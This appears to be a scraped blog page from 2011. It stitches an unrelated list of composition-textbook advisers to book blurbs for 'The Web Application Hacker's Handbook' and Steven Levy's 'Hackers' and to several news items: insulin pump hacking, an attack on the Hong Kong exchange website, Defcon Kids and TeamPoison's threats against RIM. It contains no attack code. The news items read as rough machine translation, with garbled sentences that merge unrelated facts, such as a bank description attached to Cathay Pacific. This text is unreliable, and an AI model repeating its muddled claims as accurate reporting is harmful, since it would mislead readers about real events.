MARCY CARBAJAL VAN HORN, assistant professor of English and ESL at Santa Fe Community College (FL), teaches composition to native and nonnative speakers of English and teaches the Advanced ESL Writing course. She has also taught university-level academic writing and critical thinking at Instituto Technológico y de Estudios Superiores in Mexico.

EDITORIAL ADVISERS:
Of the more than 500 experienced composition instructors who reviewed the new edition, a core group served as an editorial advisory board — carefully reviewing all new material in depth, making sure the book would work as well for their students as it always had.
Joanne ADDISON
University of Colorado, Denver

Derick BURLESON
University of Alaska, Fairbanks

Paige BYAM
Northern Kentucky University

Elizabeth CANFIELD
Virginia Commonwealth University

Richard CARR
University of Alaska, Fairbanks

Michele CHEUNG
University of Southern Maine

Jon CULLICK
Northern Kentucky University

David ENDICOTT
Tacoma Community College

Lin FRASER
Sacramento City College

Hank GALMISH
Green River Community College

Nancy GISH
University of Southern Maine

Jacqueline GRAY
St. Charles Community College

Barclay GREEN
Northern Kentucky University

Karen GROSSWEINER
University of Alaska, Fairbanks

D. J. HENRY
Daytona Beach Community College

Kandace KNUDSON
Sacramento City College

Tonya KROUSE
Northern Kentucky University

Tamara KUZMENKOV
Tacoma Community College

Cheryl LAZ
University of Southern Maine

Lydia Lynn LEWELLEN
Tacoma Community College

Jeanette LONIA
Delaware Technical and Community College

Walter LOWE
Green River Community College

Michael MACKEY
Community College of Denver

Tammy MATA
Tarrant County Community College

Holly MCSPADDEN
Missouri Southern State University

Liora MORIEL
University of Maryland, College Park

Patricia MURPHY
Missouri Southern State University

Melissa NICOLAS
University of Louisiana, Lafayette

Diane Allen O’HERON
Broome Community College

Sarah QUIRK
Waubonsee Community College

Ann SMITH
Modesto Junior College

Steve THOMAS
Community College of Denver

Nick TINGLE
University of California, Santa Barbara

Terry Myers ZAWACKI
George Mason University

The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws

The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws. This book is a practical guide to discovering and exploiting security flaws in web applications. The authors explain each category of vulnerability using real-world examples, screen shots and code extracts. The book is extremely practical in focus, and describes in detail the steps involved in detecting and exploiting each kind of security weakness found within a variety of applications such as online banking, e-commerce and other web applications.

The topics covered include bypassing login mechanisms, injecting code, exploiting logic flaws and compromising other users. Because every web application is different, attacking them entails bringing to bear various general principles, techniques and experience in an imaginative way. The most successful hackers go beyond this, and find ways to automate their bespoke attacks. This handbook describes a proven methodology that combines the virtues of human intelligence and computerized brute force, often with devastating results.

The authors are professional penetration testers who have been involved in web application security for nearly a decade. They have presented training courses at the Black Hat security conferences throughout the world. Under the alias "PortSwigger", Dafydd developed the popular Burp Suite of web application hack tools.

"If you have an interest in web application security, I would highly recommend picking up a copy of this book, especially if you’re interested in being able to audit applications for vulnerabilities".
Robert Wesley McGrew, McGrew Security

Reader'a Review :

This is the most important IT security title written in the past year or more. Why? Custom web applications offer more opportunities for exploitation than all of the publicized vulnerabilities your hear about combined. This book gives expert treatment to the subject. I found the writing to be very clear and concise in this 727 page volume. There is minimal fluff. While everything is clearly explained, this is not a beginners book. The authors assume that you can read html, JavaScript, etc... Usually with a book like this there are a few really good chapters and some so-so chapters, but that's not the case here. Chapters 3-18 in this book rock all the way through. Another huge plus is the tools in this book are free.

The first few chapters provide context and background information. Chapter 3 on Web Application Technologies provides particularly useful background info. The next 666 pages of the book are all about attacking the applications.

There next five chapters cover mapping application functionality, client side controls, authentication, sessions, and access controls. The coverage is comprehensive. I'm not new to these topics, but I learned so much in every chapter. The depth of coverage is amazing.

The next six chapters are the heart of this book. They cover injection, path traversal, application logic, XSS and related attacks, automating attacks, and information disclosure. You'll find full treatment of attacks we're all familiar with like SQL injection and cross site scripting as well as many that most of us haven't heard of before. The danger is real and these chapters need to be read.

The final next four chapters cover attacks against compiled applications, application architecture, web servers, and source code. The final two chapters are more useful as a quick reference. They provide an overview of the tools covered throughout the book and describe attack methodology discussed throughout the book for exploiting each technology.

This book scores five easily based on the relevance and value of the information.

Minggu, 14 Agustus 2011

Hackers: Heroes of the Computer Revolution - 25th Anniversary Edition

Hackers: Heroes of the Computer Revolution , This 25th anniversary edition of Steven Levy's classic book traces the exploits of the computer revolution's original hackers -- those brilliant and eccentric nerds from the late 1950s through the early '80s who took risks, bent the rules, and pushed the world in a radical new direction. With updated material from noteworthy hackers such as Bill Gates, Mark Zukerberg, Richard Stallman, and Steve Wozniak, Hackers is a fascinating story that begins in early computer research labs and leads to the first home computers.

Levy profiles the imaginative brainiacs who found clever and unorthodox solutions to computer engineering problems. They had a shared sense of values, known as "the hacker ethic," that still thrives today. Hackers captures a seminal period in recent history when underground activities blazed a trail for today's digital world, from MIT students finagling access to clunky computer-card machines to the DIY culture that spawned the Altair and the Apple II.



Amazon.com Exclusive: The Rant Heard Round the World
By Steven Levy

Author Steven Levy
When I began researching Hackers--so many years ago that it’s scary--I thought I’d largely be chronicling the foibles of a sociologically weird cohort who escaped normal human interaction by retreating to the sterile confines of computers labs. Instead, I discovered a fascinating, funny cohort who wound up transforming human interaction, spreading a culture that affects our views about everything from politics to entertainment to business. The stories of those amazing people and what they did is the backbone of Hackers: Heroes of the Computer Revolution.

But when I revisited the book recently to prepare the 25th Anniversary Edition of my first book, it was clear that I had luckily stumbled on the origin of a computer (and Internet) related controversy that still permeates the digital discussion. Throughout the book I write about something I called The Hacker Ethic, my interpretation of several principles implicitly shared by true hackers, no matter whether they were among the early pioneers from MIT’s Tech Model Railroad Club (the Mesopotamia of hacker culture), the hardware hackers of Silicon Valley’s Homebrew Computer Club (who invented the PC industry), or the slick kid programmers of commercial game software. One of those principles was “Information Should Be Free.” This wasn’t a justification of stealing, but an expression of the yearning to know more so one could hack more. The programs that early MIT hackers wrote for big computers were stored on paper tapes. The hackers would keep the tapes in a drawer by the computer so anyone could run the program, change it, and then cut a new tape for the next person to improve. The idea of ownership was alien.

This idea came under stress with the advent of personal computers. The Homebrew Club was made of fanatic engineers, along with a few social activists who were thrilled at the democratic possibilities of PCs. The first home computer they could get their hands on was 1975’s Altair, which came in a kit that required a fairly hairy assembly process. (Its inventor was Ed Roberts, an underappreciated pioneer who died earlier this year.) No software came with it. So it was a big deal when 19-year-old Harvard undergrad Bill Gates and his partner Paul Allen wrote a BASIC computer language for it. The Homebrew people were delighted with Altair BASIC, but unhappy that Gates and Allen charged real money for it. Some Homebrew people felt that their need for it outweighed their ability to pay. And after one of them got hold of a “borrowed” tape with the program, he showed up at a meeting with a box of copies (because it is so easy to make perfect copies in the digital age), and proceeded to distribute them to anyone who wanted one, gratis.

This didn’t sit well with Bill Gates, who wrote what was to become a famous “Letter to Hobbyists,” basically accusing them of stealing his property. It was the computer-age equivalent to Luther posting the Ninety-Five Theses on the Castle Church. Gate’s complaints would reverberate well into the Internet age, and variations on the controversy persist. Years later, when another undergrad named Shawn Fanning wrote a program called Napster that kicked off massive piracy of song files over the Internet, we saw a bloodier replay of the flap. Today, issues of cost, copying and control still rage--note Viacom’s continuing lawsuit against YouTube and Google. And in my own business—journalism--availability of free news is threatening more traditional, expensive new-gathering. Related issues that also spring from controversies in Hackers are debates over the “walled gardens” of Facebook and Apple’s iPad.

I ended the original Hackers with a portrait of Richard Stallman, an MIT hacker dedicated to the principle of free software. I recently revisited him while gathering new material for the 25th Anniversary Edition of Hackers, he was more hard core than ever. He even eschewed the Open Source movement for being insufficiently noncommercial.

When I spoke to Gates for the update, I asked him about his 1976 letter and the subsequent intellectual property wars. “Don’t call it war,” he said. “Thank God we have an incentive system. Striking the right balance of how this should work, you know, there's going to be tons of exploration.” Then he applied the controversy to my own situation as a journalism. “Things are in a crazy way for music and movies and books,” he said. “Maybe magazine writers will still get paid 20 years from now. Who knows? Maybe you'll have to cut hair during the day and just write articles at night.”

So Amazon.com readers, it’s up to you. Those who have not read Hackers,, have fun and be amazed at the tales of those who changed the world and had a hell of time doing it. Those who have previously read and loved Hackers, replace your beat-up copies, or the ones you loaned out and never got back, with this beautiful 25th Anniversary Edition from O’Reilly with new material about my subsequent visits with Gates, Stallman, and younger hacker figures like Mark Zuckerberg of Facebook. If you don’t I may have to buy a scissors--and the next bad haircut could be yours!

Read Bill Gates' letter to hobbyists

About the Author

Levy is a senior writer for Wired. Previously, he was chief technology writer and a senior editor for Newsweek. Levy has written six books and had articles published in Harper's, Macworld, The New York Times Magazine, The New Yorker, Premiere, and Rolling Stone. Steven has won several awards during his 30+ years of writing about technology, including Hackers, which PC Magazine named the best Sci-Tech book written in the last twenty years and, Crypto, which won the grand eBook prize at the 2001 Frankfurt Book festival.

Buy Hackers: Heroes of the Computer Revolution Kindle Editions

Kamis, 11 Agustus 2011

Hackers Can Attack the Human Body

Hackers Increasingly aggressive exploit vulnerabilities in cyberspace. In the future hackers can invade the human body.

At a security conference in Las Vegas, security researcher Jay Radcliffe showing how to stop the function of two medical devices commonly used to treat diabetes that can harm patients. All of this activity is done via an Internet connection.

Equipment susceptible to such attacks is the insulin pump, which can be controlled remotely. In this instrument gauges paired wireless glucose monitors blood sugar levels, continuous glucose meter (CGM). Every five minutes this information is passed on to insulin pumps attached to the arm.

"Wireless communications to wireless pump was not safe. This equipment is not designed to patch security holes," he said. "These devices are most vulnerable to attack hackers."

Wireless electronic devices, such as smart cellular phones or tablet computers, generally have a security system provided by the vendor patches regularly. This firmware update process to make hackers work harder to penetrate the security system.

Radcliffe tried to understand the technical specifications of CGM. He found the communication between the body sensors and monitors can be done without having to identify who the recipient of the data. He also found the chip inside the device the same as those used on computer networks used in the world auto industry.

A virus designed and inserted into the USB devices that communicate on radio frequency and can be purchased easily through eBay for $ 20. Virus Radcliffe experimental results can lead to blood sugar monitors stopped working at once deadly insulin pump.

Without enough insulin, diabetics will suffer from blurred vision and kidney damage in the long run. If it continues, the patient began to sweat and loss of motor function, respiratory system failure, and death.

Radcliffe artificial virus is only to show security holes in devices which support human health. "The danger is always lurking, we can not simply ignore," he said. "Nobody wants to pave the insulin pump 15 years ago, but many smart people out there who can do it."

Hong Kong returned to normal yesterday after a hacker attack

Hong Kong Exchanges & Clearing Ltd., operator of the largest stock exchange by market value, yesterday suspended trading in shares of several companies, including HSBC Holdings Plc after the bourse website is burglarized hackers.

Europe's biggest bank by market capitalization, Cathay Pacific Airways Ltd., and five other stock trading halted after a malicious attack on the bourse website on the disclosure of information. Hacker attacks came after the Hong Kong bourse rebounds.

"The situation is very worrisome because the attacks targeting the mechanisms of information disclosure," said Charles Mok, head of the Internet Society.

Hong Kong Stock Exchange suspended trading in issuers who publish information that is sensitive to stock price, including the matter of performance and acquisitions. HSBC said its stock stopped trading yesterday as the statement on the sale of units of credit card and retail services in the United States.

Wednesday afternoon, the stock convince investors that these investors have equal access to information. Hong Kong's chief executive Charles Li said the exchange would put up an online bulletin board as an alternate and will advertise in print media to tell where investors can access the data issuers. "Based on our investigation, this is an attack from outside hackers," Li said yesterday (10 / 8) in a press conference.

Li added that the current stock is looking to know where the hacker. Hong Kong Exchange Commissioner Ronald Arculli said the bourse was reviewing its technology infrastructure. Arculli said today, Hong Kong's return to normal operation.

Technology Crime Division of the Hong Kong Police are currently investigating the burglary case of this stock. Similarly, the stock regulator, the Securities and Futures Commission.

First in Defcon, Hacker Classes for Children

Defcon, the world-level conference for the hackers (hackers) held a Kids Defcon, hackers classes specifically for children. This performance is the first time in 19 years organizing Defcon.

Class discussions and tutorials are intended for children ages 8 to 16 years. Demand no less, 60 children attend classes that took place during the 6 to August 7, 2011 last. Defcon is itself a convention attended by some 10,000 hackers to share their knowledge about the techniques to penetrate and secure the computer and other devices.

In the event that was held in Las Vegas, USA, 4-7 August 2011, these children were divided into two classes. Here they met the veteran hackers, security experts from the Homeland Security and the National Security Agency. They also listened to the history of hacking and cryptography lesson.

The participants also had the opportunity to follow demonstrations and workshops with various themes such as learning to unlock the Masters, Google Hacking, Making Electronics, Social Engineering, Coding in Scratch and Communicating in Code. The committee provides work space for kids who want to participate in hacking activities, including codebreaking Museum, Makerbot and Hardware Hacking Station.

Children are welcome to participate in a hacking competition that was held specifically for them. One is the competition reveals the key to be used for example when they forget the key combination of storage cabinets. They are also challenged to find vulnerabilities in a number of devices, ranging from games to computer devices.

Race committee require that parents accompany children who follow this particular class. "Defcon Kids not childcare. Children are the responsibility of the parents so they must be accompanied throughout the session in both the classroom and work space," reads a warning in the official website Defcon Kids.

Participants of this particular class of mostly children who were born and raised in environments that are very familiar with the computer world. Some even already have a certificate in information technology. One of Xavier, a man 14 years already have two certificates in IT. Xavier is the son of Rey Ayers, 42, an information security specialist from one company in San Francisco, and won the Defcon.

To participate in this class, parents and children must have Defcon badge, which can be obtained at registration at a cost of $ 150.

Source : National Geographic

Hackers Threaten Manufacturers BlackBerry

hacker blackberryLondon - Chaos in England gave birth to a "war" between the manufacturer of BlackBerry versus new hackers. After the manufacturers of BlackBerry, Research In Motion (RIM), the British promised to help police control riots, hackers (hackers) got angry. A hacker calling himself Trick-TeamPoison retaliated by attacking the official blog of RIM. They changed the front page of the blog.


Hacker also claims the employees pocketed RIM data. According zdnet.co.uk page, if RIM is continuing its plan to help the police then the hacker team will present its information-sensitive information RIM employees. "We have access to your database, including address, name, phone number, if you continue to assist the police, we will make this information available to the public and present it to the rioters," wrote the message.

Trick-TeamPoison also threatened if RIM is helping the police with a track record of conversation data BlackBerry users who allegedly associated with the British riots, RIM would regret.
RIM had promised to expose the location (based on GPS data) those related riots.

Riots swept through London. The unrest which started last Saturday at Tottenham Hale, London, England, has also been extended to a number of areas. Currently London is conducive conditions, but places like Manchester actually started to increase their damaging action. Widespread rioting that began with the shooting of Mark Duggan is growing rapidly because of the role of the BlackBerry messaging service or BlackBerry Messenger (BBM).

TeamPoison also mocking Twitter BlackBerry in the UK. One chirp TeamPoison to account @ UK_blackberry is "Now we sit and laugh, see the BlackBerry repair his blog."

BlackBerry's official blog yesterday had an addressable blogs.blackberry.com down between 17.00 local time. RIM Center in Canada has declined to comment on the condition of their blog.

RIM's threat against vandals london raises a lot of rumors circulating in the fuel forums and Twitter. Rumor is called the RIM BlackBerry messaging service will be shut down to prevent communication between the rioters.